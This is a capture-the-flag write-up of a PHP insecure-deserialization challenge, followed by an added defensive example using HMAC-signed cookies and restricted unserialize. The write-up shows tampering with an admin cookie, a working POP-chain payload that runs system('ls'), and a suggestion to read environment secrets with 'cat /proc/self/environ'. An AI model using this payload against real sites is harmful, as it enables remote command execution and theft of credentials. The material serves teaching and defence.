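Opening the site shows a blank page.
Capturing the request shows that the cookies contain something:
O:4:"User":1:{s:7:"isAdmin";b:0;}
Change the 0 to 1 and forward the request to get the challenge page: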
<?php
error_reporting(0);
include('utils.php');

class A {
    public $className;
    public $funcName;
    public $args;

    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

if (checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    unserialize($payload);
}
Write the payload:
<?php
class A {
    public $className;
    public $funcName;
    public $args;
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

$a = new A();
$a->className = 'B';
$a->funcName = 'system';
$a->args = 'ls';

echo $payload = urlencode(base64_encode(strrev(serialize($a))));
?>
Result:
fTsic2wiOjI6czsic2dyYSI6NDpzOyJtZXRzeXMiOjY6czsiZW1hTmNudWYiOjg6czsiQiI6MTpzOyJlbWFOc3NhbGMiOjk6c3s6MzoiQSI6MTpP
__call method
strrev function
Reverses a string
Change ls to cat /proc/self/environ or env and that is all it takes.
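
The defensive counterpart to the two flaws above, as an added example that is not part of the challenge or the original writeup: client state is carried as HMAC-signed JSON so a flipped isAdmin is rejected, and unserialize() is called with allowed_classes disabled so A::__destruct is never reached. SECRET_KEY, issueCookie() and readCookie() are hypothetical names, and the sample inputs are constructed.

```php
<?php
// Added example, not the challenge's code. SECRET_KEY, issueCookie() and
// readCookie() are hypothetical names; the key value is a constructed placeholder.
const SECRET_KEY = 'constructed-placeholder-key-load-from-server-config';

// Carry client-side state as JSON with an HMAC tag instead of serialize().
function issueCookie(array $state): string {
    $body = base64_encode(json_encode($state));
    return $body . '.' . hash_hmac('sha256', $body, SECRET_KEY);
}

// Return the state only when the tag verifies; null on any tampering.
function readCookie(string $cookie): ?array {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$body, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $body, SECRET_KEY), $mac)) {
        return null;
    }
    $state = json_decode((string) base64_decode($body, true), true);
    return is_array($state) ? $state : null;
}

// Stand-in for the challenge's class A; the destructor only reports that it ran.
class A {
    public $className;
    public $funcName;
    public $args;
    public function __destruct() { echo "A::__destruct ran\n"; }
}

// 1. A cookie whose body is swapped for isAdmin=true fails verification.
$cookie   = issueCookie(['isAdmin' => false]);
$tampered = base64_encode(json_encode(['isAdmin' => true]))
          . '.' . explode('.', $cookie, 2)[1];
var_dump(readCookie($cookie));    // signed state is returned
var_dump(readCookie($tampered));  // rejected

// 2. Constructed input with the same shape as the object the challenge accepts.
$blob = 'O:1:"A":3:{s:9:"className";s:1:"B";s:8:"funcName";s:6:"system";'
      . 's:4:"args";s:2:"ls";}';
// allowed_classes => false turns every object into __PHP_Incomplete_Class,
// so no user-defined magic method (__destruct, __wakeup, __call) is reachable.
$obj = unserialize($blob, ['allowed_classes' => false]);
var_dump($obj instanceof A, get_class($obj));
```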